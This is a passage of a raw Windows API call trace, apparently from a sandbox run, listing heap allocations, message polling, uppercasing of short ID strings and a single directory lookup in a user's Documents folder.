dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0216.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0216.058] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0216.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0216.058] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0216.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0216.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0216.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0216.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0216.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0216.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.060] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0216.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0216.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0216.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0216.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0216.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0216.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0216.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0216.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0216.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0216.062] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0216.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0216.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0216.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0216.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0216.063] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Mpp4LjR5L7", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc92a3740, ftCreationTime.dwHighDateTime=0x1d5cff2, ftLastAccessTime.dwLowDateTime=0x9529bd80, ftLastAccessTime.dwHighDateTime=0x1d5cc23, ftLastWriteTime.dwLowDateTime=0x9529bd80, ftLastWriteTime.dwHighDateTime=0x1d5cc23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mpp4LjR5L7", cAlternateFileName="MPP4LJ~1")) returned 0x9e2138 [0216.063] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0216.064] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0216.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0216.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0216.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0216.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0216.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0216.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0216.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0216.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0216.065] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0216.065] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.065] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.065] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.065] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0216.066] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0216.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0216.066] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.066] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0216.066] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0216.066] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0216.066] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0216.066] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0216.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 